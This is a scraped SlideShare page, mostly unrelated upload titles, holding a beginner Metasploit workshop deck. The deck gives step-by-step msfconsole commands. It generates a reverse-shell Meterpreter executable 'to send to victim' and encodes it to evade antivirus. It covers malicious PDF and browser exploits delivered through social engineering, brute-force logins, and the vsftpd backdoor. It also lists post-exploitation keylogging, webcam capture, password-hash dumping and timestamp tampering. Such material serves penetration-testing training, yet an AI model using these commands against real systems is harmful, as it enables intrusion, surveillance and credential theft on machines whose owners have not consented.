Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxVishalSingh1417
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxEsquimalt MFRC
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxAreebaZafar22
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfNirmal Dwivedi
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...pradhanghanshyam7136
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17Celine George
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...Nguyen Thanh Tu Collection
 
Vishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdf
Vishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdfVishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdf
Vishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdfssuserdda66b
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Association for Project Management
 
Single or Multiple melodic lines structure
Single or Multiple melodic lines structureSingle or Multiple melodic lines structure
Single or Multiple melodic lines structuredhanjurrannsibayan2
 

Recently uploaded (20)

Dyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptxDyslexia AI Workshop for Slideshare.pptx
Dyslexia AI Workshop for Slideshare.pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 
FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024FSB Advising Checklist - Orientation 2024
FSB Advising Checklist - Orientation 2024
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptxSKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
SKILL OF INTRODUCING THE LESSON MICRO SKILLS.pptx
 
How to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSHow to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POS
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptx
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and Modifications
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
 
How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Vishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdf
Vishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdfVishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdf
Vishram Singh - Textbook of Anatomy Upper Limb and Thorax.. Volume 1 (1).pdf
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...Making communications land - Are they received and understood as intended? we...
Making communications land - Are they received and understood as intended? we...
 
Single or Multiple melodic lines structure
Single or Multiple melodic lines structureSingle or Multiple melodic lines structure
Single or Multiple melodic lines structure
 

Metasploit Humla for Beginner

  • 1. By : Ajay Srivastava
  • 2. Please don’t expect ….  How to evade antiviruses (antivirus evasion)  How to do pivoting  How to do port forwarding  How to write your own metasploit module
  • 3. Disclaimer All the information or technique you will be learning here is for educational purpose and should not be used for malicious activities.
  • 4. Agenda  Introduction  Basics of Metasploit  Information gathering  Exploitation  ( 11:30-11:45 - Break 1/ Tea )*  Meterpreter Basics  Post exploitation using meterpreter  Meterpeter scripts  ( 1:00 – 2:00 - Break 2 / Lunch )*
  • 5. Agenda  Metasploit utilities  Client-side exploitation  ( 4:00-4:20 – Break 3 / Tea )*  Auxiliary module  And we are done   * Lunch and Tea are self sponsored.
  • 6. Introduction  It’s not a Tool, it’s a Framework !!!
  • 7. History  Developed by H.D Moore in 2003  Originally written in Perl & later on rewritten in Ruby  Acquired by Rapid7 in 2009  Remains open source & free for use
  • 9. Libraries  Rex :  The basic library for most tasks  Handles sockets and protocols  MSF CORE :  Defines the Metasploit Framework  Provides the ‘basic’ API  MSF BASE :  Provides the ‘friendly’ API  Provides simplified APIs for use in the Framework
  • 10. Modules  Exploit  Modules used for actually attacking the systems and grabbing the access.  Payload  Piece of code which executes on remote system after successful exploitation.  Auxiliary  Exploit without payload. Used for scanning, fuzzing & doing various tasks.
  • 11. Modules  Encoders  Program which encodes our payload to avoid antivirus detection  Nops  Used to keep payload size consistent
  • 12. Payloads  Single  Completely standalone  eg: Add user  Stagers  Creates the network connection  Stages  Downloaded by the stagers  eg: Meterpreter
  • 13. Payloads  Payload is staged if represented by ‘/’ in the payload name  Windows/shell_bind_tcp  single payload with no stage  Windows/shell/bind_tcp  a stager (bind_tcp)  a stage (shell)
  • 15. MSFCONSOLE  Most powerful interface among all interfaces
  • 18. Armitage  Graphical version of Metasploit  Developed by Raphel Mudge  Supports both GUI & CLI
  • 20. Basics Commands  #msfconsole  #msfupdate  MSFConsole commands are classified in two types :  Core Commands  Database commands
  • 21. Core Commands  help or ?  banner  version  show  search  msf>search <module name>  info  msf>info <module name>  use  msf>use <exploit/auxiliary name>
  • 22. Core Commands  back  show options  set  msf>set <option> <value>  setg  msf>set <option> <value>  unset  msf>set <option> <value>  unsetg  msf>set <option> <value>
  • 23. Core Commands  show payloads  set payload  msf>set payload <payload name>  check  exploit  run
  • 24. Database Commands  Default database : PostgreSQL  Database.yml  /opt/metasploit/apps/pro/ui/config/database.yml  # cat database.yml  db_status  db_disconnect
  • 26. Database Commands  db_nmap  # db_nmap –sV –A –O <ip range>  hosts  # hosts –h  services  # services
  • 27. Database Commands  vulns  db_export  db_import  db_rebuild_cache  creds  db_load  db_unload
  • 28. Information Gathering  Auxiliary modules are the best !!!  Will cover in detail later  Using auxiliary/scanner/portscan/tcp  # msf>auxiliary/scanner/portscan/tcp Or  nmap <switches> <ip address>
  • 29. Exploitation  To list available exploits :  msf> search <exploit name>  To select an exploit :  msf> use <exploit name>  To get information about selected exploits  msf/exploitname> info  To check the options and set arguments  msf/exploitname> show options  To set the target host  msf/exploitname> set rhost <victim ip>
  • 30. Exploitation  To list supported payload with selected exploit  msf/exploitname> show payloads  To set the payload  msf/exploitname> set payload <payload name>  To set attacker machine  msf/exploitname> Set lhost <own ip>  To check if target is vuln to selected exploit  msf/exploitname> Check  To launch the attack  msf/exploitname> exploit
  • 31.
  • 32. Meterpreter  Post exploitation module  Runs in the exploited process context  Runs in memory and doesn’t create any file on disk  Encrypted communication  Stable and extensible
  • 33. Meterpreter  Classification  Core commands  File system commands  System commands  User interface commands  Priv commands  Networking commands
  • 34. Meterpreter : Core commands  background  sessions  ps  migrate  bgrun/bglist/bgkill  resource
  • 35. Meterpreter : Core commands  Run  #msf>run <script name>  Channel  #msf>execute –f <program> -c  Use  #msf>use <extension name>
  • 36. Meterpreter:File System Commands  pwd  cd  getlwd/getlcd  ls  cat/edit  download/upload
  • 37. Meterpreter:File System Commands  search  #msf>search –d <directory> -f *.<fileformat> -r  mkdir/rmdir  rm/rmdir  del
  • 38. Meterpreter : System Commands  sysinfo  getpid/getuid  shell  reboot  shutdown  ps
  • 39. Meterpreter : UI Commands  User interface & Webcam commands  idletime  keyscan_start  keyscan_dump  keyscan_stop  webcam_list  webcam_snap
  • 40. Meterpreter : Privs Commands  getsystem  hashdump  timestomp  timestomp –h  timestomp <filepath> -v { to display all atributes}  timestomp <filepath> -c <MM/DD/YYYY H:M:S>
  • 41. Meterpreter: Networking commands  arp  ipconfig/ifconfig  netstat  route  portfwd
  • 42. Meterpreter scripts  Path :  /usr/share/metasploit-framework/scripts/meterpreter  Or  meterpreter>run <tab multiple times>
  • 43. Meterpreter scripts run <script name>  run checkvm  run credcollect  run keylogrecorder  run winenum  run getcountermeasure  run getgui
  • 44. Meterpreter scripts  run scraper  run hostedit  run gettelnet  run arpscanner  run vnc  run filecollector  #msf>run filecollector –d <dnm> -f *.txt -r
  • 45.
  • 46. Metasploit Utilities  Three main utilities to generate shellcode and to evade antiviruses  Msfpayload  Msfencode  Msfvenom
  • 47. Msfpayload  To generate payload in different formats as exe ,C , Ruby and javascript  Using msfpayload :  root@kali:~# msfpayload -h  To check options  root@kali:~# msfpayload <payload name> O  root@:~# msfpayload windows/meterpreter/reverse_tcp O  Setting the options  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 X > exploit.exe  Sending this exploit.exe to victim
  • 48. Using Mutli-handler Exploit / setting listener  Setup listner:  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp  msf exploit(handler) > show options  msf exploit(handler) > set lhost <attacker ip>  msf exploit(handler) > set lport 4422  msf exploit(handler) > exploit
  • 49. MSFEncode  To bypass antiviruses  Alters code , by converting into binary EXE. While interacting back , it will decode and execute the same into memory.  Payload is encoded by different encoders
  • 50. MSFEncode  root@kali:~# msfencode -h  Usage: /opt/metasploit/apps/pro/msf3/msfencode <options>  OPTIONS:  -e <opt> The encoder to use  -c <opt> The number of times to encode the data  -t <opt> The output format: bash,c,java,perl,pl,py,python,raw,sh,vbscript,asp,aspx,exe  -x <opt> Specify an alternate executable template  -k Keep template working; run payload in new thread (use with -x)
  • 51. MSFEncode  list encoders:  root@kali:~# msfencode –l  msfencode with msfpayload:  root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker ip> LPORT=4422 R | msfencode -e x86/shikata_ga_nai -c 8 -t exe > /var/www/exploitbypass.exe
  • 52. Client-side Attacks  Difficult to find server-side vulnerabilities  Most enterprises have incoming connections locked down with firewalls  Client-side attacks are the most common ones: - Browser based attacks - Social engineering attacks using malicious link or file
  • 53. Client-side Attacks:Browser based  Using IE 6 based Aurora exploit  msf > search aurora  msf > use exploit/windows/browser/ms10_002_aurora  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set srvhost <attacker ip>  msf exploit(ms10_002_aurora) > set srvport 80  msf exploit(ms10_002_aurora) > set uripath /test
  • 54. Client-side Attacks:Browser based  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp  msf exploit(ms10_002_aurora) > show options  msf exploit(ms10_002_aurora) > set lhost <own ip>  msf exploit(ms10_002_aurora) > set lport 443  msf exploit(ms10_002_aurora) > exploit
  • 55. Client-side Attacks:File Format  Nowadays file format based exploits are exploiting targets in wild.  File formats such as pdf , doc or rtf are sent as attachment to the victim and expected to open it.  For eg:  Adobe util.printf() Bufferoverflow vulnerability  MS14-017 Microsoft Word RTF Object Confusion
  • 56. Client-side Attacks:File Format  Exploiting Adobe util.printf() Bufferoverflow vulnerability  msf > search adobe_utilprintf  msf > use exploit/windows/fileformat/adobe_utilprintf  msf exploit(adobe_utilprintf) > set filename resume.pdf  msf exploit(adobe_utilprintf) > show options  msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
  • 57. Client-side Attacks:File Format  msf exploit(adobe_utilprintf) > setg lhost <attacker ip>  msf exploit(adobe_utilprintf) > set lport 443  msf exploit(adobe_utilprintf) > exploit  Setup listener(i.e multi/handler)  Send this resume.pdf using some social engineering techniques.
  • 58. Client-side Attacks:File Format  Setting up listener on local machine :  msf > search multi/handler  msf > use exploit/multi/handler  msf exploit(handler) > show options  msf exploit(handler) > set lhost <own ip>  msf exploit(handler) > set lport 443  msf exploit(handler) > exploit
  • 59.
  • 60. Auxiliary Modules  Pre-exploitation module  Port scanners, fuzzers, banner grabbers, brute-force module etc.  Path:  /usr/share/metasploit-framework/modules/auxiliary or  Using show auxiliary on msfconsole :  msf > show auxiliary  Used without payloads
  • 61. Auxiliary Modules  Used same as exploits but without payload  msf> use <auxiliary name>  ‘run’ command instead of ‘exploit’ command  RHOSTS instead of RHOST
  • 62. Auxiliary Modules : Port scanners  Portscanner auxiliary module used for port scanning  Using portscanners :  msf > search portscan  msf > use auxiliary/scanner/portscan/tcp  msf auxiliary(tcp) > show options  msf auxiliary(tcp) > set rhosts <target>  msf auxiliary(tcp) > set ports 1-100  msf auxiliary(tcp) > set threads 10  msf auxiliary(tcp) > run
  • 63. Auxiliary Modules : SMB version fingerprinting  msf > search smb_version  msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > show options  msf auxiliary(smb_version) > set rhosts 192.168.37.0/24  msf auxiliary(smb_version) > set threads 10  msf auxiliary(smb_version) > run
  • 64. Auxiliary Modules : Version Scanner  Banner grabbing of MySQL server :  msf > search MySQL  msf > use auxiliary/scanner/mysql/mysql_version  msf auxiliary(mysql_version) > show options  msf auxiliary(mysql_version) >set rhosts <target>  msf auxiliary(mysql_version) > run
  • 65. Auxiliary Modules: Login Scanners  Testing login attack on MySQL :  msf > use auxiliary/scanner/mysql/mysql_login  msf auxiliary(mysql_login) > show options  msf auxiliary(mysql_login) > setg rhosts <target>  msf auxiliary(mysql_login) > set user_file userfile.txt
  • 66. Auxiliary Modules: Login Scanners  msf auxiliary(mysql_login) > set pass_file passfile.txt  msf auxiliary(mysql_login) > set stop_on_success true  msf auxiliary(mysql_login) > run
  • 67. Auxiliary Modules : Telnet  msf > search telnet_login  msf > use auxiliary/scanner/telnet/telnet_login  msf auxiliary(telnet_login) > show options  msf auxiliary(telnet_login)) > setg rhosts <target ip>  msf auxiliary(telnet_login) > set user_file userfile.txt
  • 68. Auxiliary Modules : Telnet  msf auxiliary(telnet_login) > set pass_file passfile.txt  msf auxiliary(telnet_login) > set stop_on_success true  msf auxiliary(telnet_login) > run  Verify:  root@kali:~# telnet <target ip>
  • 69. Auxiliary Modules : Attacking FTP  msf > search ftp_version  msf > use auxiliary/scanner/ftp/ftp_version  msf auxiliary(ftp_version) > show options  msf auxiliary(ftp_version) > set rhosts <target>  msf auxiliary(ftp_version) > run  Result on metasploitable2: FTP Banner: '220 (vsFTPd 2.3.4)
  • 70. Auxiliary Modules : Attacking FTP  Now checking for ftp login  msf > search ftp_login  msf > use auxiliary/scanner/ftp/ftp_login  msf auxiliary(ftp_login) > set rhosts <target ip>  msf auxiliary(ftp_login) > set user_file userfile.txt  msf auxiliary(ftp_login) > set pass_file passfile.txt  msf auxiliary(ftp_login) > set stop_on_success true  msf auxiliary(ftp_login) > run  Successful FTP login for 'msfadmin':'msfadmin'
  • 71. Auxiliary Modules : Attacking FTP  From FTP version scan we know its version is vsFTPd 2.3.4  Now looking for exploit of this FTP version  msf > search vsFTPd 2.3.4  msf > use exploit/unix/ftp/vsftpd_234_backdoor  msf exploit(vsftpd_234_backdoor) > show options  msf exploit(vsftpd_234_backdoor) > set rhost <target ip>  msf exploit(vsftpd_234_backdoor) > show payloads  msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact  msf exploit(vsftpd_234_backdoor) > exploit
  • 72.
  • 73. References  Metasploit Guide, http://packetstormsecurity.com/files/119280,  Securitytube Metasploit Framework Expert (SMFE course by Vivek Ramachandran)  Metasploit Unleashed ,  http://www.offensive-security.com/metasploit- unleashed/Main_Page